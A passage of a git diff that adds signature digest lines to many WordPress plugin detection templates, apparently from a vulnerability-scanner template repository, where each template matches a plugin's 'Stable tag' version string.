b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..afe9c72639 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220065d068bde6fbdf93a817d20b6aadc9413c7617f102a2c7861f406f69b0c0b9202205aecae37992d2493f880b04f1329b543f62ae889736950b7170f7e76dc34c024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..27f6ac7874 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e00b3df1cddee0f34510ce413c59b81e4b044ea934c40cbb605127a851a6995902207a1356aa3ffa15ab6f83617e19db94ac3f5f53af32edc04162bdd5b9e9429443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..0326ccecfd 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202f5a7d2093db309cc99ad4be6ee0e818bf6709de0c5c0e275efb00298d600be1022100c0efd5cd5bf05cd9b646c42fb8af3ed3d82b5aa195e53d576e8786e2b2fcd665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..4b9f23d674 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220428f69f7d601657718a59c3c5964762cd417a67d08d4deeb445983b1dedb149f022100d4cc0ccd6ee29779f4897a82543a89b5ab9311351eab2214aa0918fbd86db0ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..1dc4e045dd 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022011dae129819538f189e8608f2f48f7f891e0bb0f2a90ad586b50925df391dc2702210084216a9d6acf15886e714668369eb2b2c0eacfeea65afaa17140e14a74934633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..344e98341f 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204300fc1a3722917c8da9a3c31f4221e8c175d51f920c2a6554ff0759d4719623022100a0b6c703620c39fb93a98ebd379dd91ee54dfd7d7b3aae598fdda90292838b3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index fe4c223cba..495ff26a5b 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022007f736cfbb779bf3e790047bbe1157d588ffcd254d314adcda64ed93889bdf94022100ba8b398a66aa37243e10142aa5421e60ccc2aaf4a194fba169eb72f952a88ae3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..4d36b1574e 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200f57467589aad55a74cfae205b4f0e577d8c734f0ba81905662b98b836c6e74002207a59be04aedc168b468535daca544646b97f1ff905c048eb697a43886cb0cd8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..07b796e3a9 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200fffe765fa752b1a6c5e2aec461e3a405dcae7e92a77420d601530603a8b0a24022100f856961ae4d105721e0078ed3eda025f4cb46b370d2bc54dd4aa11c17e049ac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..0c8460aeeb 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220183ab10fad94177e62d899d5f8a8ef59e9fcde827580c5fad07f9f7e181e1a19022100bddf301c004ec845cc542d0a514d61b73ec6dd482aebb3b67d1a9a87b2ed4104:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..b0744bbe1f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022003a170193d15733ce3d570aa715767b1f336ecb4a160aae1a1edef6404549313022100c3c0bc7da1cf4a43205d9e9e451ebd70318fd296dbc6436a41d4c6d528dcaa75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 5ea77f898d..29ab7bdfe8 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204fe631e6dd11f21a285d37e2f82bd5d818c2145ed27642410786483ab35a9a26022100f96178d35557d1fae9d2c2822475e94059aafdb3c3a208ac6ef2a781d4925d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..a1b2f14707 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f949bee598693e0fc0601a8ba9c0151d665e223013a2d0f0422f6be1cfddbab3022100ae41d42574185a2fff6f20d12a68395d8edfaad1bb191e80a05514209a0ea981:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 554a7ddc52..f47563c858 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008b86fa3ae76b176d8aa6987da738221d5e3ade962093123fae12c83bca3d3a9902202831ddc48d8920ece10ccaf0cf9036e6e4b1f9c16055170b7602defd39bc3755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..bf841aae64 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100abc399cc5d0319d5f0822f072d3af1bbaf8cadfe5449d60c5632bd569bc4d0a60221009753769d557882c8d91b65c31cd154f12366ea4690bff137a533e510cf5c3738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..f09eab6873 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220101ada14f39029ee147e347e5a95e729e6d874669d923b1c67fc5123cc621904022044f2257638b76fbef86ad339fef81123fac647e27c46d422c592ca91e67f9242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..65c10e7421 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100bfec72f8cc047a2a94a36026dc175a5fe0889233599bb16b5af660e6e9f87901022100dd4490e0df91deaab3d0d327a7d145a8d88f1e0e95756ccd6ce0bd2b64a58399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..8732427feb 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205fb7f576bc9b61710ba607391a5b62dcc43e0a4f2cfabf4137ac52098d3259fc02205fb04f677dc163c5d667f593e3048ebcf39086a189021b9cbbc7a9e43c3c7b45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..3cd0868c08 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202caa31e5a9d4d6d3d4cff83ef39a04d5b17a87ee8fec503186f6577a1e162bdb02203b430e8fffe408982daafea95af33dddc4f7cdafb0120342381012a4a1c36d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..aadaf97b70 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206091815d753085488e5509fa7fb08e1499ae2f9988767f926187a7bb1fc9232c022035082c661032eaa5ad3bdfbcd4ef86ca993d4b9c870f52489d9608204f2c9c90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..9bb3569207 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c373521828964954939cc558cd8bc3a2f0b0024289ae6cf6010e67061a9612f60220741b014b5fcb8ffcacc8064845730ceb01f23ecfec6c68b7253353ee31debd08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..2cd5ccdb57 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221008ebe45ca25d9b5e1bfa50595f555d183b23822b86afb197965884d56360659d602204d906077448abe9b9229ed7598efb566fb6f035bdd920bf6ff1006a109d329b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index ce5dc03713..2927f11776 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f739ad064a62a5cc41c0a24b20b4f6b50591230fc0a782d06142366ca8a0386d02201780d4b6c84ee09c915ac773ee36eb91ce04b3cc9e5ced715851b184717f4753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..c6b976be2a 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022046b14e79ba3bce9a507a6bfa8bac08f585d40ef07f39bb407b21254fa495bfd502210080ecdb600dd81e591720b4a27e456b435a37af7ea84ec003a17d9dc1bec40d0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..874e5707d7 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022048171b830b625ec81dc5d3b4cfa0d76e2f7779866e822d0685c639ecfa97cc42022069ccb4ffc879a3ffb43ae3ed60cb03f004623ac60fd03df77a7a42e22628b7a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..7b64f947f7 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402202c1394b6dfcdec04d0ae6a854b0fea4d10b76ad6e671bad5bd56b36ff656d7b2022057fda143a10e9d812f7391ad8e7f179c827d6b75b3a5c55e5ead879a5e7bd046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..5017496053 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f9eef2c5927a4af716a04a0af2ec5f326680f545d7a767e753c9775285168700022100f6c4f191ff3521daf7dfe55d7908135f924129c3b414dbba49d5b52bf4a64c89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 45260ccfba..97d8e5c6e2 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f7a9021154d632757bcd393915a435d7581be05483f64e1ceb0839fe4b5c901a022024c7e881fc9dd2d44f3e8d625e05f815f2635e7f98a78cf638d235616e832a7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..e49fe2e15e 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009181318b2d842444ff3c769c1ee6f94c5da5459db559384ee98cca2f4412f6200220764713b5faae6760b06aae9ec8f0e92d58498d1a6bde974affee5e256bfbbcc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..090c1cb665 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203e920bd085a4bb787cf92fbe4f6e81b9dc04e9eeb59d778ad644e44b1a5cf77b0221008385d22e70cbd2949dc1a985b7876f081453dc73737ad472603f42e4e4c58e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 64cfced6cf..a44ba069c9 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202d29540f6559c7dd6abd71e2016e8fb887bb871908310ff7203a6f9ba607ce4d022100c10d245b44e37b4282666fd97de1ee2d6d57c12d5e7ca4edeb58239b3d9ae7c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..d0f88e7f31 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022021615511d4ed5e0e157296dc146f82dab27039b616faccef4a940334af4cfddb022100e64b3f6c46ce693dbcc46ce41cb0e4e3d97493b6af9128ea7b5fd3ff90145eb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..205d472a7c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a6ce2fb69038a81c54e7799092aa8e910bc6e5d732ab65fbc2ea31cba2f2e61b02205c6a5e2f43269ba46d4c14501b220779e8cc30bde46227fdce1dd9e27dbce5af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..2b6b95c81b 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c90e6316ababc81dcd5e6665452b75a66d5b8ab30978980d4a38b0149e2ca2c10221008be02527436861c717cb76101998ff2f99865f59855f65dbd55372287fbced2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..fe7bcf702d 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100d7b488f2920fbbab85e13b96d2560c4b18ac426a201bcd3611dc28a24c642342022100ffbe36b9c37e0d89d29faafbfa64deb119691465f1ff3a7b92f96fe54a760e9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..b5e8664cbd 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a0048304602210081f879f59f336ae98455f4b3a0e64582c92af04304b805a4721470e99efdffc8022100e06f0cb7e9f5ee0c3a7339b448aff7e10a05025d82bc9308e9fd58595f988b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..babd3900e2 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c7df88a8dc4de014e61f3ad93bac3809c3d3bbc69ce313bf84874eda9f8f1bd80221008d65baffc9c25b24623d625ecee2c104b1442b16b6437a6f83e127543754c329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..0f99e62a90 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207d39cdc52b0a91a6749dcbe9aea14b555ae6b48acca61c6f056ddcd0941eb533022100df82cca29b7a79f62b015666ecaad38e3fee6fa4d47c0e8083b72c55109f703b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..fe43baaa8f 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202e8b511db6e97d1c6f357fb50b5d024432e5d428fb3bf0b546b63799eb2b0c85022100ae9a80ccef1c6bded3165f21712b8a528559305747acdcbcec126507478138c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..19e3288d04 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100cf280bf49bf301c9cd7afa412a3ab11aaecedaa11bb6b191284ceb2b87be25b0022100a79a0b4b479f915a6576f38ca554c852754576250d1747ac268837142c5e4f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 4a68323ae1..82ffe0582c 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022067f3a4a0395e1b62c15c42841fea56e158041086031054bd5ece5605f77a90ef02202b3ebb5c24928aa09aa6a072d5760d1ba2ac4a060ed239ccac3e83c4afcf2e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..e164fbf8ee 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502201795c0065c76beea1e7bd9b19d50c81b08f7fad8a3496ec1d62254c8c94e66e1022100846983c6e5a43c7093e3d3bea2d8a5595929d2a565961cb4c163586c2bd35e52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..0cca8365d3 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204fe23ff760e5d23cffd75abd99ca3956a1fe0752de54e73a3e6600d888a9a43f022100f618bc7b781581928ac24fa5b6a00690dfe06c04be01bf1e76432a3935339639:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..cf5455bdb5 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022069c0ccc658a30f3b4da1e0d3d65d53bcb12d7925cf37c8f2cce561251f00e10702207c680ab2a05ec147238f709efae3baaf048befa588bad809e76f73a708a3d191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..8d8eb305cd 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210093b7170bbe172f350985f811515d305a142b9353dd79442331e79595aa6d9c1b0220259fc78a970ba73af58e95d8e952342ed44cd50eac131e98102106e588b489b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..e8d9f401c9 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203c92e76ce1c5d39d70c19130527155f3e7312a5bdda4e5db3219894d3f1bb68802203cc21755ba8f7bda031f83a46780c637586608eb6f70365e86ec04a843b88693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..64dbeeb680 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022063bfbc233ebef381d5225a42698163fa1a90deaa6ae30ae6b44162d307ca0de0022100c697043419dec812838af2de7c2c5ec2b190f1fcc1127ba20a6785f02868cdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 